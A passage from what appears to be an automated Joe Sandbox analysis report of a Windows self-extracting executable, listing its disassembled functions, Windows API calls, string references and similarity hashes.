SetWindowTextW.USER32(?,?), ref: 0038C127
_wcsrchr.LIBVCRUNTIME ref: 0038C2B1
GetDlgItem.USER32(?,00000066), ref: 0038C2EC
SetWindowTextW.USER32(00000000,?), ref: 0038C2FC
SendMessageW.USER32(00000000,00000143,00000000,003BA472), ref: 0038C30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0038C335

Strings

%s.%d.tmp, xrefs: 0038BFF6
Software\Microsoft\Windows\CurrentVersion, xrefs: 0038C1D0
<br>, xrefs: 0038C08A
ProgramFilesDir, xrefs: 0038C1FB

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: ca6342b9e4adfa0a3aece46ef0de5baf5d25db67a6e9501b3d4f64414743ab32
Instruction ID: 857f3f78d0c4e8a1a7d827f1f3a6fec24f3972ec2e9dde54a3c6323560c20fdf
Opcode Fuzzy Hash: ca6342b9e4adfa0a3aece46ef0de5baf5d25db67a6e9501b3d4f64414743ab32
Instruction Fuzzy Hash: 04E17172D04619AADF27EBA0DC45EEF737CAF09310F1144A6F609E7091EB749B848B60

Function 0037D341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0037D346
_wcschr.LIBVCRUNTIME ref: 0037D367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0037D328,?), ref: 0037D382
__fprintf_l.LIBCMT ref: 0037D873

Part of subcall function 0038137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0037B652,00000000,?,?,?,00010432), ref: 00381396

Strings

,, xrefs: 0037D8AE
$%s:, xrefs: 0037D856
RTL, xrefs: 0037D838
R, xrefs: 0037D4E5
$9:, xrefs: 0037D6AF
*messages***, xrefs: 0037D49A
@%s:, xrefs: 0037D85D, 0037D869
*messages***, xrefs: 0037D4D3
, xrefs: 0037D67A
a, xrefs: 0037D4EF

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$$9:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-552849085
Opcode ID: d64bf0472e149be10bcb43b6f150b62ab7d9e8b6e1fe98e82754c773804d6317
Instruction ID: b36c16d3c3ee2314152584193af17a30dea17cb901d6e1405882b6adec495567
Opcode Fuzzy Hash: d64bf0472e149be10bcb43b6f150b62ab7d9e8b6e1fe98e82754c773804d6317
Instruction Fuzzy Hash: 3712B4B19002199ADF36DFA4DC81BEEB7B9FF05710F108569F509BB181EB789A44CB24

Function 0038CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0038AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0038AC85
Part of subcall function 0038AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038AC96
Part of subcall function 0038AC74: IsDialogMessageW.USER32(00010432,?), ref: 0038ACAA
Part of subcall function 0038AC74: TranslateMessage.USER32(?), ref: 0038ACB8
Part of subcall function 0038AC74: DispatchMessageW.USER32(?), ref: 0038ACC2

GetDlgItem.USER32(00000068,003CECB0), ref: 0038CB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0038A632,00000001,?,?,0038AECB,003A4F88,003CECB0), ref: 0038CB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0038CBA1
SendMessageW.USER32(00000000,000000C2,00000000,003A35B4), ref: 0038CBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0038CBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0038CBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0038CC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0038CC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0038CC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0038CC67
SendMessageW.USER32(00000000,000000C2,00000000,003A431C), ref: 0038CC76

Strings

\, xrefs: 0038CBCF

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: b9ae7bef783fe2689a0acebbf05a6e18ef5448dc09b26bde75bb5300821b8607
Instruction ID: 9311feefca3ae13b1fa52e29ef3f890e7c573d58f1c8c117e5949d65d39ab095
Opcode Fuzzy Hash: b9ae7bef783fe2689a0acebbf05a6e18ef5448dc09b26bde75bb5300821b8607
Instruction Fuzzy Hash: 2731C271186742AFE303EF24EC4AFAB7FACEB92705F00050AF65196191DB755908C7B6

Function 0038CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 0038CF54
ShowWindow.USER32(?,00000000), ref: 0038CF93
GetExitCodeProcess.KERNEL32(?,?), ref: 0038CFCF
CloseHandle.KERNEL32(?), ref: 0038CFF5
ShowWindow.USER32(?,00000001), ref: 0038D084

Part of subcall function 003817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0037BB05,00000000,.exe,?,?,00000800,?,?,003885DF,?), ref: 003817C2

Strings

.inf, xrefs: 0038CF10
, xrefs: 0038CEA2
.exe, xrefs: 0038CFFF

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 0d23c1a38ce6bbbdee69fddd0607cf8fdbbf47e294da75714cf64b3673cd2228
Instruction ID: 854a96acd4a13873e051db74e9a08cc87806bc34c7c8fe06f47b71e2c1e7f550
Opcode Fuzzy Hash: 0d23c1a38ce6bbbdee69fddd0607cf8fdbbf47e294da75714cf64b3673cd2228
Instruction Fuzzy Hash: 1661F8B04143809BE733BF24D800AABBBF9EF85344F05989EF5C597191D7B19985CB62

Function 0039A058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00394E35,00394E35,?,?,?,0039A2A9,00000001,00000001,3FE85006), ref: 0039A0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0039A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0039A138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0039A232
__freea.LIBCMT ref: 0039A23F

Part of subcall function 00398518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0039C13D,00000000,?,003967E2,?,00000008,?,003989AD,?,?,?), ref: 0039854A

__freea.LIBCMT ref: 0039A248
__freea.LIBCMT ref: 0039A26D

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 4d2d1c7ff2a9ac29956562862bf2fe624900ad4d013721356c47ae1e8e15b69b
Instruction ID: 8865ff25b0b08fa3cb5cb96231c0395340bbb4b21700ee69e950e4dad321e9a9
Opcode Fuzzy Hash: 4d2d1c7ff2a9ac29956562862bf2fe624900ad4d013721356c47ae1e8e15b69b
Instruction Fuzzy Hash: 5F51C272610A16AFDF269F64CC41EBB77AAEB41750F164B29FC44DA180DB36DC40C6E2

Function 0038A2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0038A2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 0038A315

Part of subcall function 003817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0037BB05,00000000,.exe,?,?,00000800,?,?,003885DF,?), ref: 003817C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0038A305

Strings

EDIT, xrefs: 0038A2E9, 0038A2F4, 0038A301
@Ut, xrefs: 0038A315

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Ut$EDIT
API String ID: 4243998846-2065656831
Opcode ID: 037109eac1ba7be8c9a182db10d2b37ac8a920b4a1e845e25c8765c7dbd6c0dc
Instruction ID: cfe21b102c6937019df036958485d7a777a3ee77293fb0e9908d7a2a9ca75b50
Opcode Fuzzy Hash: 037109eac1ba7be8c9a182db10d2b37ac8a920b4a1e845e25c8765c7dbd6c0dc
Instruction Fuzzy Hash: F0F0A736A027287BE7326665AC05FDB776C9F46B10F090097BD45E6180D7A09D41C7F6

Function 0038A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00380085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003800A0
Part of subcall function 00380085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0037EB86,Crypt32.dll,00000000,0037EC0A,?,?,0037EBEC,?,?,?), ref: 003800C2

OleInitialize.OLE32(00000000), ref: 0038A34E
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0038A385
SHGetMalloc.SHELL32(003B8430), ref: 0038A38F

Strings

3Qo, xrefs: 0038A366
riched20.dll, xrefs: 0038A33D

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Qo
API String ID: 3498096277-4232643773
Opcode ID: 455fe1b7f9c3e22e6761687b4437a51596f3fa66a1b0cb591c593123f7b94858
Instruction ID: a8e82048a4cb2c758327d0c481e8004eb434efea2fffc81b614c42e68fc6793f
Opcode Fuzzy Hash: 455fe1b7f9c3e22e6761687b4437a51596f3fa66a1b0cb591c593123f7b94858
Instruction Fuzzy Hash: B0F049B1C00209ABCB11AF99D8499EFFBFCEF95301F00416BE814E2210CBB44605CBA1

Function 003799B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,003778AD,?,00000005,?,00000011), ref: 00379A4C
GetLastError.KERNEL32(?,?,003778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00379A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,003778AD,?,00000005,?), ref: 00379A8E
GetLastError.KERNEL32(?,?,003778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00379A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,003778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00379ADB

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 6d6c73b05ab16552fd36960a19cb0d70fbffd4d753b02146c2590033a223a15a
Instruction ID: 5fa20fa31b6f8f206e8e0f6c7a64ebe46df30de0123b44568804d3d44edd91f7
Opcode Fuzzy Hash: 6d6c73b05ab16552fd36960a19cb0d70fbffd4d753b02146c2590033a223a15a
Instruction Fuzzy Hash: 784178305447456FE332CB20CC06BDABBD4FB06324F10471AFAE9961D0E3B8A988CB95

Function 0038AC74 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0038AC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038AC96
IsDialogMessageW.USER32(00010432,?), ref: 0038ACAA
TranslateMessage.USER32(?), ref: 0038ACB8
DispatchMessageW.USER32(?), ref: 0038ACC2

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 85d9546955c6ad7b67ad2111a87c8f8b559ccecb05d9063eb89ad8dbabe52818
Instruction ID: 874e6ccd1724997498b66ccac6376c334038da9321b4133e7880caf6535d1e11
Opcode Fuzzy Hash: 85d9546955c6ad7b67ad2111a87c8f8b559ccecb05d9063eb89ad8dbabe52818
Instruction Fuzzy Hash: 9CF03071D02229AB9B21ABE2EC4CDEB7F7CEE15751B408456F505D2100EB38D405C7B1

Function 003976BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\CPYEzG7VGh.exe,00000104), ref: 003976FD
_free.LIBCMT ref: 003977C8
_free.LIBCMT ref: 003977D2

Strings

C:\Users\user\Desktop\CPYEzG7VGh.exe, xrefs: 003976F4, 003976FB, 0039772A, 00397762

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\CPYEzG7VGh.exe
API String ID: 2506810119-1957023031
Opcode ID: 7dbdfca17be1a13c754a8f03f22d9da4c74b948d1f18971fd71ef81317739f6d
Instruction ID: 6ce25e0318fe1a2586e7b904980fd64828681d7ce662f814e9f8a1c4ebaf737b
Opcode Fuzzy Hash: 7dbdfca17be1a13c754a8f03f22d9da4c74b948d1f18971fd71ef81317739f6d
Instruction Fuzzy Hash: 11317C71A19218BFDF23DFD9EC819AEBBECEF85710F154066E8049B251D6708E40CBA0

Function 0038D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0038D29D
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0038D2D9

Strings

sfxcmd, xrefs: 0038D298
sfxpar, xrefs: 0038D2D4

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 5760ee2b412093b10b022ff75f82704e510f1ec452a8c6cc7d8dc1fc6dc36a76
Instruction ID: ec28e3390a4f91bf2e2c64f894d8407ed73f0c5ad22741ddc26b7a51699daf3f
Opcode Fuzzy Hash: 5760ee2b412093b10b022ff75f82704e510f1ec452a8c6cc7d8dc1fc6dc36a76
Instruction Fuzzy Hash: AAF0A772801328A6C7237F909C09AFA775CFF0A751B014491FC48A6241D665CD40D7F1

Function 0037984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0037985E
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00379876
GetLastError.KERNEL32 ref: 003798A8
GetLastError.KERNEL32 ref: 003798C7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: aa1e7b09edba7ce89a5cacfc3fc2c4d5c0155d3f1757c764b2da970b4043896f
Instruction ID: a47945522cca62cb55489fed8f03fd8670358b453fd42ef0ac94cf45e18a5475
Opcode Fuzzy Hash: aa1e7b09edba7ce89a5cacfc3fc2c4d5c0155d3f1757c764b2da970b4043896f
Instruction Fuzzy Hash: 9A115E31900604FBDB329A55C804B6977ACEB1B731F10C72BF46EA5A90D7399E409F53

Function 0039A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0037CFE0,00000000,00000000,?,0039A49B,0037CFE0,00000000,00000000,00000000,?,0039A698,00000006,FlsSetValue), ref: 0039A526
GetLastError.KERNEL32(?,0039A49B,0037CFE0,00000000,00000000,00000000,?,0039A698,00000006,FlsSetValue,003A7348,003A7350,00000000,00000364,?,00399077), ref: 0039A532
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0039A49B,0037CFE0,00000000,00000000,00000000,?,0039A698,00000006,FlsSetValue,003A7348,003A7350,00000000), ref: 0039A540

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 8a5aacb4790a1dacf7079a0def6d09716cc6281c3ab3a5b0ef86ec177c3093f7
Instruction ID: 17edb25a2c5e3bf756c95a59603c2f70114323accf3a83b9e95b1ec3f6228b7e
Opcode Fuzzy Hash: 8a5aacb4790a1dacf7079a0def6d09716cc6281c3ab3a5b0ef86ec177c3093f7
Instruction Fuzzy Hash: A601F732711622ABCF239A69AC44A67BB9CAF47BA1B270720F947D3140D721D900C6E1

Function 0039B188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00398FA5: GetLastError.KERNEL32(?,003B0EE8,00393E14,003B0EE8,?,?,00393713,00000050,?,003B0EE8,00000200), ref: 00398FA9
Part of subcall function 00398FA5: _free.LIBCMT ref: 00398FDC
Part of subcall function 00398FA5: SetLastError.KERNEL32(00000000,?,003B0EE8,00000200), ref: 0039901D
Part of subcall function 00398FA5: _abort.LIBCMT ref: 00399023

Part of subcall function 0039B2AE: _abort.LIBCMT ref: 0039B2E0
Part of subcall function 0039B2AE: _free.LIBCMT ref: 0039B314

Part of subcall function 0039AF1B: GetOEMCP.KERNEL32(00000000,?,?,0039B1A5,?), ref: 0039AF46

_free.LIBCMT ref: 0039B200
_free.LIBCMT ref: 0039B236

Strings

:, xrefs: 0039B22A

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID: :
API String ID: 2991157371-3499768093
Opcode ID: 3d58022817f50a08c9d2506e629488bbadeafe27c37e06da3b22b885aa0682a7
Instruction ID: 2568b230453c758a965c34aaf6adeda1b1b8d02ed1f955b096a96d179e5f1fce
